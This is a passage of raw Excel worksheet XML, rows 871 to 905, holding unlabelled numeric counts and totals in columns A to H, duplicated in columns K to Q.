        <v>3</v>
      </c>
      <c r="G871" s="8">
        <v>20</v>
      </c>
      <c r="H871" s="8">
        <v>159</v>
      </c>
      <c r="K871" s="7">
        <v>2259</v>
      </c>
      <c r="L871" s="8">
        <v>25</v>
      </c>
      <c r="M871" s="8">
        <v>2</v>
      </c>
      <c r="N871" s="8">
        <v>40</v>
      </c>
      <c r="O871" s="8">
        <v>69</v>
      </c>
      <c r="P871" s="8">
        <v>3</v>
      </c>
      <c r="Q871" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="872" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A872" s="7">
        <v>2267</v>
      </c>
      <c r="B872" s="8">
        <v>24</v>
      </c>
      <c r="C872" s="8">
        <v>1</v>
      </c>
      <c r="D872" s="8">
        <v>15</v>
      </c>
      <c r="E872" s="8">
        <v>0</v>
      </c>
      <c r="F872" s="8">
        <v>14</v>
      </c>
      <c r="G872" s="8">
        <v>4</v>
      </c>
      <c r="H872" s="8">
        <v>58</v>
      </c>
      <c r="K872" s="7">
        <v>2267</v>
      </c>
      <c r="L872" s="8">
        <v>24</v>
      </c>
      <c r="M872" s="8">
        <v>1</v>
      </c>
      <c r="N872" s="8">
        <v>15</v>
      </c>
      <c r="O872" s="8">
        <v>0</v>
      </c>
      <c r="P872" s="8">
        <v>14</v>
      </c>
      <c r="Q872" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="873" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A873" s="7">
        <v>2272</v>
      </c>
      <c r="B873" s="8">
        <v>26</v>
      </c>
      <c r="C873" s="8">
        <v>2</v>
      </c>
      <c r="D873" s="8">
        <v>0</v>
      </c>
      <c r="E873" s="8">
        <v>0</v>
      </c>
      <c r="F873" s="8">
        <v>26</v>
      </c>
      <c r="G873" s="8">
        <v>0</v>
      </c>
      <c r="H873" s="8">
        <v>54</v>
      </c>
      <c r="K873" s="7">
        <v>2272</v>
      </c>
      <c r="L873" s="8">
        <v>26</v>
      </c>
      <c r="M873" s="8">
        <v>2</v>
      </c>
      <c r="N873" s="8">
        <v>0</v>
      </c>
      <c r="O873" s="8">
        <v>0</v>
      </c>
      <c r="P873" s="8">
        <v>26</v>
      </c>
      <c r="Q873" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="874" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A874" s="7">
        <v>2273</v>
      </c>
      <c r="B874" s="8">
        <v>6</v>
      </c>
      <c r="C874" s="8">
        <v>1</v>
      </c>
      <c r="D874" s="8">
        <v>11</v>
      </c>
      <c r="E874" s="8">
        <v>0</v>
      </c>
      <c r="F874" s="8">
        <v>8</v>
      </c>
      <c r="G874" s="8">
        <v>3</v>
      </c>
      <c r="H874" s="8">
        <v>29</v>
      </c>
      <c r="K874" s="7">
        <v>2273</v>
      </c>
      <c r="L874" s="8">
        <v>6</v>
      </c>
      <c r="M874" s="8">
        <v>1</v>
      </c>
      <c r="N874" s="8">
        <v>11</v>
      </c>
      <c r="O874" s="8">
        <v>0</v>
      </c>
      <c r="P874" s="8">
        <v>8</v>
      </c>
      <c r="Q874" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="875" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A875" s="7">
        <v>2275</v>
      </c>
      <c r="B875" s="8">
        <v>30</v>
      </c>
      <c r="C875" s="8">
        <v>1</v>
      </c>
      <c r="D875" s="8">
        <v>0</v>
      </c>
      <c r="E875" s="8">
        <v>0</v>
      </c>
      <c r="F875" s="8">
        <v>20</v>
      </c>
      <c r="G875" s="8">
        <v>1</v>
      </c>
      <c r="H875" s="8">
        <v>52</v>
      </c>
      <c r="K875" s="7">
        <v>2275</v>
      </c>
      <c r="L875" s="8">
        <v>30</v>
      </c>
      <c r="M875" s="8">
        <v>1</v>
      </c>
      <c r="N875" s="8">
        <v>0</v>
      </c>
      <c r="O875" s="8">
        <v>0</v>
      </c>
      <c r="P875" s="8">
        <v>20</v>
      </c>
      <c r="Q875" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="876" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A876" s="7">
        <v>2276</v>
      </c>
      <c r="B876" s="8">
        <v>22</v>
      </c>
      <c r="C876" s="8">
        <v>1</v>
      </c>
      <c r="D876" s="8">
        <v>0</v>
      </c>
      <c r="E876" s="8">
        <v>0</v>
      </c>
      <c r="F876" s="8">
        <v>1</v>
      </c>
      <c r="G876" s="8">
        <v>5</v>
      </c>
      <c r="H876" s="8">
        <v>29</v>
      </c>
      <c r="K876" s="7">
        <v>2276</v>
      </c>
      <c r="L876" s="8">
        <v>22</v>
      </c>
      <c r="M876" s="8">
        <v>1</v>
      </c>
      <c r="N876" s="8">
        <v>0</v>
      </c>
      <c r="O876" s="8">
        <v>0</v>
      </c>
      <c r="P876" s="8">
        <v>1</v>
      </c>
      <c r="Q876" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="877" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A877" s="7">
        <v>2277</v>
      </c>
      <c r="B877" s="8">
        <v>25</v>
      </c>
      <c r="C877" s="8">
        <v>0</v>
      </c>
      <c r="D877" s="8">
        <v>5</v>
      </c>
      <c r="E877" s="8">
        <v>4</v>
      </c>
      <c r="F877" s="8">
        <v>8</v>
      </c>
      <c r="G877" s="8">
        <v>4</v>
      </c>
      <c r="H877" s="8">
        <v>46</v>
      </c>
      <c r="K877" s="7">
        <v>2277</v>
      </c>
      <c r="L877" s="8">
        <v>25</v>
      </c>
      <c r="M877" s="8">
        <v>0</v>
      </c>
      <c r="N877" s="8">
        <v>5</v>
      </c>
      <c r="O877" s="8">
        <v>4</v>
      </c>
      <c r="P877" s="8">
        <v>8</v>
      </c>
      <c r="Q877" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="878" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A878" s="7">
        <v>2278</v>
      </c>
      <c r="B878" s="8">
        <v>26</v>
      </c>
      <c r="C878" s="8">
        <v>1</v>
      </c>
      <c r="D878" s="8">
        <v>12</v>
      </c>
      <c r="E878" s="8">
        <v>15</v>
      </c>
      <c r="F878" s="8">
        <v>11</v>
      </c>
      <c r="G878" s="8">
        <v>19</v>
      </c>
      <c r="H878" s="8">
        <v>84</v>
      </c>
      <c r="K878" s="7">
        <v>2278</v>
      </c>
      <c r="L878" s="8">
        <v>26</v>
      </c>
      <c r="M878" s="8">
        <v>1</v>
      </c>
      <c r="N878" s="8">
        <v>12</v>
      </c>
      <c r="O878" s="8">
        <v>15</v>
      </c>
      <c r="P878" s="8">
        <v>11</v>
      </c>
      <c r="Q878" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="879" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A879" s="7">
        <v>2282</v>
      </c>
      <c r="B879" s="8">
        <v>20</v>
      </c>
      <c r="C879" s="8">
        <v>1</v>
      </c>
      <c r="D879" s="8">
        <v>66</v>
      </c>
      <c r="E879" s="8">
        <v>100</v>
      </c>
      <c r="F879" s="8">
        <v>10</v>
      </c>
      <c r="G879" s="8">
        <v>6</v>
      </c>
      <c r="H879" s="8">
        <v>203</v>
      </c>
      <c r="K879" s="7">
        <v>2282</v>
      </c>
      <c r="L879" s="8">
        <v>20</v>
      </c>
      <c r="M879" s="8">
        <v>1</v>
      </c>
      <c r="N879" s="8">
        <v>66</v>
      </c>
      <c r="O879" s="8">
        <v>100</v>
      </c>
      <c r="P879" s="8">
        <v>10</v>
      </c>
      <c r="Q879" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="880" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A880" s="7">
        <v>2284</v>
      </c>
      <c r="B880" s="8">
        <v>26</v>
      </c>
      <c r="C880" s="8">
        <v>0</v>
      </c>
      <c r="D880" s="8">
        <v>0</v>
      </c>
      <c r="E880" s="8">
        <v>0</v>
      </c>
      <c r="F880" s="8">
        <v>5</v>
      </c>
      <c r="G880" s="8">
        <v>0</v>
      </c>
      <c r="H880" s="8">
        <v>31</v>
      </c>
      <c r="K880" s="7">
        <v>2284</v>
      </c>
      <c r="L880" s="8">
        <v>26</v>
      </c>
      <c r="M880" s="8">
        <v>0</v>
      </c>
      <c r="N880" s="8">
        <v>0</v>
      </c>
      <c r="O880" s="8">
        <v>0</v>
      </c>
      <c r="P880" s="8">
        <v>5</v>
      </c>
      <c r="Q880" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="881" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A881" s="7">
        <v>2287</v>
      </c>
      <c r="B881" s="8">
        <v>7</v>
      </c>
      <c r="C881" s="8">
        <v>1</v>
      </c>
      <c r="D881" s="8">
        <v>0</v>
      </c>
      <c r="E881" s="8">
        <v>3</v>
      </c>
      <c r="F881" s="8">
        <v>0</v>
      </c>
      <c r="G881" s="8">
        <v>0</v>
      </c>
      <c r="H881" s="8">
        <v>11</v>
      </c>
      <c r="K881" s="7">
        <v>2287</v>
      </c>
      <c r="L881" s="8">
        <v>7</v>
      </c>
      <c r="M881" s="8">
        <v>1</v>
      </c>
      <c r="N881" s="8">
        <v>0</v>
      </c>
      <c r="O881" s="8">
        <v>3</v>
      </c>
      <c r="P881" s="8">
        <v>0</v>
      </c>
      <c r="Q881" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="882" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A882" s="7">
        <v>2290</v>
      </c>
      <c r="B882" s="8">
        <v>20</v>
      </c>
      <c r="C882" s="8">
        <v>1</v>
      </c>
      <c r="D882" s="8">
        <v>4</v>
      </c>
      <c r="E882" s="8">
        <v>0</v>
      </c>
      <c r="F882" s="8">
        <v>7</v>
      </c>
      <c r="G882" s="8">
        <v>6</v>
      </c>
      <c r="H882" s="8">
        <v>38</v>
      </c>
      <c r="K882" s="7">
        <v>2290</v>
      </c>
      <c r="L882" s="8">
        <v>20</v>
      </c>
      <c r="M882" s="8">
        <v>1</v>
      </c>
      <c r="N882" s="8">
        <v>4</v>
      </c>
      <c r="O882" s="8">
        <v>0</v>
      </c>
      <c r="P882" s="8">
        <v>7</v>
      </c>
      <c r="Q882" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="883" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A883" s="7">
        <v>2293</v>
      </c>
      <c r="B883" s="8">
        <v>0</v>
      </c>
      <c r="C883" s="8">
        <v>0</v>
      </c>
      <c r="D883" s="8">
        <v>0</v>
      </c>
      <c r="E883" s="8">
        <v>0</v>
      </c>
      <c r="F883" s="8">
        <v>21</v>
      </c>
      <c r="G883" s="8">
        <v>54</v>
      </c>
      <c r="H883" s="8">
        <v>75</v>
      </c>
      <c r="K883" s="7">
        <v>2293</v>
      </c>
      <c r="L883" s="8">
        <v>0</v>
      </c>
      <c r="M883" s="8">
        <v>0</v>
      </c>
      <c r="N883" s="8">
        <v>0</v>
      </c>
      <c r="O883" s="8">
        <v>0</v>
      </c>
      <c r="P883" s="8">
        <v>21</v>
      </c>
      <c r="Q883" s="8">
        <v>54</v>
      </c>
    </row>
    <row r="884" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A884" s="7">
        <v>2295</v>
      </c>
      <c r="B884" s="8">
        <v>26</v>
      </c>
      <c r="C884" s="8">
        <v>1</v>
      </c>
      <c r="D884" s="8">
        <v>0</v>
      </c>
      <c r="E884" s="8">
        <v>0</v>
      </c>
      <c r="F884" s="8">
        <v>15</v>
      </c>
      <c r="G884" s="8">
        <v>2</v>
      </c>
      <c r="H884" s="8">
        <v>44</v>
      </c>
      <c r="K884" s="7">
        <v>2295</v>
      </c>
      <c r="L884" s="8">
        <v>26</v>
      </c>
      <c r="M884" s="8">
        <v>1</v>
      </c>
      <c r="N884" s="8">
        <v>0</v>
      </c>
      <c r="O884" s="8">
        <v>0</v>
      </c>
      <c r="P884" s="8">
        <v>15</v>
      </c>
      <c r="Q884" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="885" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A885" s="7">
        <v>2296</v>
      </c>
      <c r="B885" s="8">
        <v>264</v>
      </c>
      <c r="C885" s="8">
        <v>2</v>
      </c>
      <c r="D885" s="8">
        <v>30</v>
      </c>
      <c r="E885" s="8">
        <v>25</v>
      </c>
      <c r="F885" s="8">
        <v>6</v>
      </c>
      <c r="G885" s="8">
        <v>1</v>
      </c>
      <c r="H885" s="8">
        <v>328</v>
      </c>
      <c r="K885" s="7">
        <v>2296</v>
      </c>
      <c r="L885" s="8">
        <v>264</v>
      </c>
      <c r="M885" s="8">
        <v>2</v>
      </c>
      <c r="N885" s="8">
        <v>30</v>
      </c>
      <c r="O885" s="8">
        <v>25</v>
      </c>
      <c r="P885" s="8">
        <v>6</v>
      </c>
      <c r="Q885" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="886" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A886" s="7">
        <v>2297</v>
      </c>
      <c r="B886" s="8">
        <v>0</v>
      </c>
      <c r="C886" s="8">
        <v>0</v>
      </c>
      <c r="D886" s="8">
        <v>5</v>
      </c>
      <c r="E886" s="8">
        <v>62</v>
      </c>
      <c r="F886" s="8">
        <v>3</v>
      </c>
      <c r="G886" s="8">
        <v>1</v>
      </c>
      <c r="H886" s="8">
        <v>71</v>
      </c>
      <c r="K886" s="7">
        <v>2297</v>
      </c>
      <c r="L886" s="8">
        <v>0</v>
      </c>
      <c r="M886" s="8">
        <v>0</v>
      </c>
      <c r="N886" s="8">
        <v>5</v>
      </c>
      <c r="O886" s="8">
        <v>62</v>
      </c>
      <c r="P886" s="8">
        <v>3</v>
      </c>
      <c r="Q886" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="887" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A887" s="7">
        <v>2300</v>
      </c>
      <c r="B887" s="8">
        <v>26</v>
      </c>
      <c r="C887" s="8">
        <v>1</v>
      </c>
      <c r="D887" s="8">
        <v>5</v>
      </c>
      <c r="E887" s="8">
        <v>0</v>
      </c>
      <c r="F887" s="8">
        <v>22</v>
      </c>
      <c r="G887" s="8">
        <v>8</v>
      </c>
      <c r="H887" s="8">
        <v>62</v>
      </c>
      <c r="K887" s="7">
        <v>2300</v>
      </c>
      <c r="L887" s="8">
        <v>26</v>
      </c>
      <c r="M887" s="8">
        <v>1</v>
      </c>
      <c r="N887" s="8">
        <v>5</v>
      </c>
      <c r="O887" s="8">
        <v>0</v>
      </c>
      <c r="P887" s="8">
        <v>22</v>
      </c>
      <c r="Q887" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="888" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A888" s="7">
        <v>2304</v>
      </c>
      <c r="B888" s="8">
        <v>1</v>
      </c>
      <c r="C888" s="8">
        <v>0</v>
      </c>
      <c r="D888" s="8">
        <v>6</v>
      </c>
      <c r="E888" s="8">
        <v>0</v>
      </c>
      <c r="F888" s="8">
        <v>1</v>
      </c>
      <c r="G888" s="8">
        <v>1</v>
      </c>
      <c r="H888" s="8">
        <v>9</v>
      </c>
      <c r="K888" s="7">
        <v>2304</v>
      </c>
      <c r="L888" s="8">
        <v>1</v>
      </c>
      <c r="M888" s="8">
        <v>0</v>
      </c>
      <c r="N888" s="8">
        <v>6</v>
      </c>
      <c r="O888" s="8">
        <v>0</v>
      </c>
      <c r="P888" s="8">
        <v>1</v>
      </c>
      <c r="Q888" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="889" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A889" s="7">
        <v>2308</v>
      </c>
      <c r="B889" s="8">
        <v>25</v>
      </c>
      <c r="C889" s="8">
        <v>2</v>
      </c>
      <c r="D889" s="8">
        <v>20</v>
      </c>
      <c r="E889" s="8">
        <v>10</v>
      </c>
      <c r="F889" s="8">
        <v>50</v>
      </c>
      <c r="G889" s="8">
        <v>6</v>
      </c>
      <c r="H889" s="8">
        <v>113</v>
      </c>
      <c r="K889" s="7">
        <v>2308</v>
      </c>
      <c r="L889" s="8">
        <v>25</v>
      </c>
      <c r="M889" s="8">
        <v>2</v>
      </c>
      <c r="N889" s="8">
        <v>20</v>
      </c>
      <c r="O889" s="8">
        <v>10</v>
      </c>
      <c r="P889" s="8">
        <v>50</v>
      </c>
      <c r="Q889" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="890" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A890" s="7">
        <v>2309</v>
      </c>
      <c r="B890" s="8">
        <v>25</v>
      </c>
      <c r="C890" s="8">
        <v>1</v>
      </c>
      <c r="D890" s="8">
        <v>11</v>
      </c>
      <c r="E890" s="8">
        <v>66</v>
      </c>
      <c r="F890" s="8">
        <v>5</v>
      </c>
      <c r="G890" s="8">
        <v>2</v>
      </c>
      <c r="H890" s="8">
        <v>110</v>
      </c>
      <c r="K890" s="7">
        <v>2309</v>
      </c>
      <c r="L890" s="8">
        <v>25</v>
      </c>
      <c r="M890" s="8">
        <v>1</v>
      </c>
      <c r="N890" s="8">
        <v>11</v>
      </c>
      <c r="O890" s="8">
        <v>66</v>
      </c>
      <c r="P890" s="8">
        <v>5</v>
      </c>
      <c r="Q890" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="891" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A891" s="7">
        <v>2310</v>
      </c>
      <c r="B891" s="8">
        <v>6</v>
      </c>
      <c r="C891" s="8">
        <v>1</v>
      </c>
      <c r="D891" s="8">
        <v>0</v>
      </c>
      <c r="E891" s="8">
        <v>0</v>
      </c>
      <c r="F891" s="8">
        <v>9</v>
      </c>
      <c r="G891" s="8">
        <v>6</v>
      </c>
      <c r="H891" s="8">
        <v>22</v>
      </c>
      <c r="K891" s="7">
        <v>2310</v>
      </c>
      <c r="L891" s="8">
        <v>6</v>
      </c>
      <c r="M891" s="8">
        <v>1</v>
      </c>
      <c r="N891" s="8">
        <v>0</v>
      </c>
      <c r="O891" s="8">
        <v>0</v>
      </c>
      <c r="P891" s="8">
        <v>9</v>
      </c>
      <c r="Q891" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="892" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A892" s="7">
        <v>2313</v>
      </c>
      <c r="B892" s="8">
        <v>14</v>
      </c>
      <c r="C892" s="8">
        <v>1</v>
      </c>
      <c r="D892" s="8">
        <v>0</v>
      </c>
      <c r="E892" s="8">
        <v>0</v>
      </c>
      <c r="F892" s="8">
        <v>6</v>
      </c>
      <c r="G892" s="8">
        <v>1</v>
      </c>
      <c r="H892" s="8">
        <v>22</v>
      </c>
      <c r="K892" s="7">
        <v>2313</v>
      </c>
      <c r="L892" s="8">
        <v>14</v>
      </c>
      <c r="M892" s="8">
        <v>1</v>
      </c>
      <c r="N892" s="8">
        <v>0</v>
      </c>
      <c r="O892" s="8">
        <v>0</v>
      </c>
      <c r="P892" s="8">
        <v>6</v>
      </c>
      <c r="Q892" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="893" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A893" s="7">
        <v>2314</v>
      </c>
      <c r="B893" s="8">
        <v>15</v>
      </c>
      <c r="C893" s="8">
        <v>1</v>
      </c>
      <c r="D893" s="8">
        <v>0</v>
      </c>
      <c r="E893" s="8">
        <v>6</v>
      </c>
      <c r="F893" s="8">
        <v>1</v>
      </c>
      <c r="G893" s="8">
        <v>3</v>
      </c>
      <c r="H893" s="8">
        <v>26</v>
      </c>
      <c r="K893" s="7">
        <v>2314</v>
      </c>
      <c r="L893" s="8">
        <v>15</v>
      </c>
      <c r="M893" s="8">
        <v>1</v>
      </c>
      <c r="N893" s="8">
        <v>0</v>
      </c>
      <c r="O893" s="8">
        <v>6</v>
      </c>
      <c r="P893" s="8">
        <v>1</v>
      </c>
      <c r="Q893" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="894" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A894" s="7">
        <v>2317</v>
      </c>
      <c r="B894" s="8">
        <v>25</v>
      </c>
      <c r="C894" s="8">
        <v>1</v>
      </c>
      <c r="D894" s="8">
        <v>12</v>
      </c>
      <c r="E894" s="8">
        <v>50</v>
      </c>
      <c r="F894" s="8">
        <v>1</v>
      </c>
      <c r="G894" s="8">
        <v>6</v>
      </c>
      <c r="H894" s="8">
        <v>95</v>
      </c>
      <c r="K894" s="7">
        <v>2317</v>
      </c>
      <c r="L894" s="8">
        <v>25</v>
      </c>
      <c r="M894" s="8">
        <v>1</v>
      </c>
      <c r="N894" s="8">
        <v>12</v>
      </c>
      <c r="O894" s="8">
        <v>50</v>
      </c>
      <c r="P894" s="8">
        <v>1</v>
      </c>
      <c r="Q894" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="895" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A895" s="7">
        <v>2318</v>
      </c>
      <c r="B895" s="8">
        <v>6</v>
      </c>
      <c r="C895" s="8">
        <v>1</v>
      </c>
      <c r="D895" s="8">
        <v>5</v>
      </c>
      <c r="E895" s="8">
        <v>2</v>
      </c>
      <c r="F895" s="8">
        <v>1</v>
      </c>
      <c r="G895" s="8">
        <v>1</v>
      </c>
      <c r="H895" s="8">
        <v>16</v>
      </c>
      <c r="K895" s="7">
        <v>2318</v>
      </c>
      <c r="L895" s="8">
        <v>6</v>
      </c>
      <c r="M895" s="8">
        <v>1</v>
      </c>
      <c r="N895" s="8">
        <v>5</v>
      </c>
      <c r="O895" s="8">
        <v>2</v>
      </c>
      <c r="P895" s="8">
        <v>1</v>
      </c>
      <c r="Q895" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="896" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A896" s="7">
        <v>2323</v>
      </c>
      <c r="B896" s="8">
        <v>26</v>
      </c>
      <c r="C896" s="8">
        <v>1</v>
      </c>
      <c r="D896" s="8">
        <v>1</v>
      </c>
      <c r="E896" s="8">
        <v>0</v>
      </c>
      <c r="F896" s="8">
        <v>7</v>
      </c>
      <c r="G896" s="8">
        <v>2</v>
      </c>
      <c r="H896" s="8">
        <v>37</v>
      </c>
      <c r="K896" s="7">
        <v>2323</v>
      </c>
      <c r="L896" s="8">
        <v>26</v>
      </c>
      <c r="M896" s="8">
        <v>1</v>
      </c>
      <c r="N896" s="8">
        <v>1</v>
      </c>
      <c r="O896" s="8">
        <v>0</v>
      </c>
      <c r="P896" s="8">
        <v>7</v>
      </c>
      <c r="Q896" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="897" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A897" s="7">
        <v>2324</v>
      </c>
      <c r="B897" s="8">
        <v>25</v>
      </c>
      <c r="C897" s="8">
        <v>2</v>
      </c>
      <c r="D897" s="8">
        <v>5</v>
      </c>
      <c r="E897" s="8">
        <v>5</v>
      </c>
      <c r="F897" s="8">
        <v>7</v>
      </c>
      <c r="G897" s="8">
        <v>8</v>
      </c>
      <c r="H897" s="8">
        <v>52</v>
      </c>
      <c r="K897" s="7">
        <v>2324</v>
      </c>
      <c r="L897" s="8">
        <v>25</v>
      </c>
      <c r="M897" s="8">
        <v>2</v>
      </c>
      <c r="N897" s="8">
        <v>5</v>
      </c>
      <c r="O897" s="8">
        <v>5</v>
      </c>
      <c r="P897" s="8">
        <v>7</v>
      </c>
      <c r="Q897" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="898" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A898" s="7">
        <v>2325</v>
      </c>
      <c r="B898" s="8">
        <v>25</v>
      </c>
      <c r="C898" s="8">
        <v>1</v>
      </c>
      <c r="D898" s="8">
        <v>15</v>
      </c>
      <c r="E898" s="8">
        <v>7</v>
      </c>
      <c r="F898" s="8">
        <v>4</v>
      </c>
      <c r="G898" s="8">
        <v>5</v>
      </c>
      <c r="H898" s="8">
        <v>57</v>
      </c>
      <c r="K898" s="7">
        <v>2325</v>
      </c>
      <c r="L898" s="8">
        <v>25</v>
      </c>
      <c r="M898" s="8">
        <v>1</v>
      </c>
      <c r="N898" s="8">
        <v>15</v>
      </c>
      <c r="O898" s="8">
        <v>7</v>
      </c>
      <c r="P898" s="8">
        <v>4</v>
      </c>
      <c r="Q898" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="899" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A899" s="7">
        <v>2331</v>
      </c>
      <c r="B899" s="8">
        <v>6</v>
      </c>
      <c r="C899" s="8">
        <v>1</v>
      </c>
      <c r="D899" s="8">
        <v>12</v>
      </c>
      <c r="E899" s="8">
        <v>12</v>
      </c>
      <c r="F899" s="8">
        <v>9</v>
      </c>
      <c r="G899" s="8">
        <v>8</v>
      </c>
      <c r="H899" s="8">
        <v>48</v>
      </c>
      <c r="K899" s="7">
        <v>2331</v>
      </c>
      <c r="L899" s="8">
        <v>6</v>
      </c>
      <c r="M899" s="8">
        <v>1</v>
      </c>
      <c r="N899" s="8">
        <v>12</v>
      </c>
      <c r="O899" s="8">
        <v>12</v>
      </c>
      <c r="P899" s="8">
        <v>9</v>
      </c>
      <c r="Q899" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="900" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A900" s="7">
        <v>2332</v>
      </c>
      <c r="B900" s="8">
        <v>26</v>
      </c>
      <c r="C900" s="8">
        <v>1</v>
      </c>
      <c r="D900" s="8">
        <v>5</v>
      </c>
      <c r="E900" s="8">
        <v>5</v>
      </c>
      <c r="F900" s="8">
        <v>5</v>
      </c>
      <c r="G900" s="8">
        <v>3</v>
      </c>
      <c r="H900" s="8">
        <v>45</v>
      </c>
      <c r="K900" s="7">
        <v>2332</v>
      </c>
      <c r="L900" s="8">
        <v>26</v>
      </c>
      <c r="M900" s="8">
        <v>1</v>
      </c>
      <c r="N900" s="8">
        <v>5</v>
      </c>
      <c r="O900" s="8">
        <v>5</v>
      </c>
      <c r="P900" s="8">
        <v>5</v>
      </c>
      <c r="Q900" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="901" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A901" s="7">
        <v>2333</v>
      </c>
      <c r="B901" s="8">
        <v>0</v>
      </c>
      <c r="C901" s="8">
        <v>0</v>
      </c>
      <c r="D901" s="8">
        <v>6</v>
      </c>
      <c r="E901" s="8">
        <v>72</v>
      </c>
      <c r="F901" s="8">
        <v>1</v>
      </c>
      <c r="G901" s="8">
        <v>0</v>
      </c>
      <c r="H901" s="8">
        <v>79</v>
      </c>
      <c r="K901" s="7">
        <v>2333</v>
      </c>
      <c r="L901" s="8">
        <v>0</v>
      </c>
      <c r="M901" s="8">
        <v>0</v>
      </c>
      <c r="N901" s="8">
        <v>6</v>
      </c>
      <c r="O901" s="8">
        <v>72</v>
      </c>
      <c r="P901" s="8">
        <v>1</v>
      </c>
      <c r="Q901" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="902" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A902" s="7">
        <v>2335</v>
      </c>
      <c r="B902" s="8">
        <v>30</v>
      </c>
      <c r="C902" s="8">
        <v>0</v>
      </c>
      <c r="D902" s="8">
        <v>0</v>
      </c>
      <c r="E902" s="8">
        <v>0</v>
      </c>
      <c r="F902" s="8">
        <v>18</v>
      </c>
      <c r="G902" s="8">
        <v>21</v>
      </c>
      <c r="H902" s="8">
        <v>69</v>
      </c>
      <c r="K902" s="7">
        <v>2335</v>
      </c>
      <c r="L902" s="8">
        <v>30</v>
      </c>
      <c r="M902" s="8">
        <v>0</v>
      </c>
      <c r="N902" s="8">
        <v>0</v>
      </c>
      <c r="O902" s="8">
        <v>0</v>
      </c>
      <c r="P902" s="8">
        <v>18</v>
      </c>
      <c r="Q902" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="903" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A903" s="7">
        <v>2337</v>
      </c>
      <c r="B903" s="8">
        <v>26</v>
      </c>
      <c r="C903" s="8">
        <v>0</v>
      </c>
      <c r="D903" s="8">
        <v>34</v>
      </c>
      <c r="E903" s="8">
        <v>17</v>
      </c>
      <c r="F903" s="8">
        <v>7</v>
      </c>
      <c r="G903" s="8">
        <v>2</v>
      </c>
      <c r="H903" s="8">
        <v>86</v>
      </c>
      <c r="K903" s="7">
        <v>2337</v>
      </c>
      <c r="L903" s="8">
        <v>26</v>
      </c>
      <c r="M903" s="8">
        <v>0</v>
      </c>
      <c r="N903" s="8">
        <v>34</v>
      </c>
      <c r="O903" s="8">
        <v>17</v>
      </c>
      <c r="P903" s="8">
        <v>7</v>
      </c>
      <c r="Q903" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="904" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A904" s="7">
        <v>2339</v>
      </c>
      <c r="B904" s="8">
        <v>24</v>
      </c>
      <c r="C904" s="8">
        <v>0</v>
      </c>
      <c r="D904" s="8">
        <v>1</v>
      </c>
      <c r="E904" s="8">
        <v>2</v>
      </c>
      <c r="F904" s="8">
        <v>1</v>
      </c>
      <c r="G904" s="8">
        <v>3</v>
      </c>
      <c r="H904" s="8">
        <v>31</v>
      </c>
      <c r="K904" s="7">
        <v>2339</v>
      </c>
      <c r="L904" s="8">
        <v>24</v>
      </c>
      <c r="M904" s="8">
        <v>0</v>
      </c>
      <c r="N904" s="8">
        <v>1</v>
      </c>
      <c r="O904" s="8">
        <v>2</v>
      </c>
      <c r="P904" s="8">
        <v>1</v>
      </c>
      <c r="Q904" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="905" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A905" s="7">
        <v>2340</v>
      </c>
      <c r="B905" s="8">
        <v>0</v>
      </c>
      <c r="C905" s="8">
        <v>0</v>
      </c>
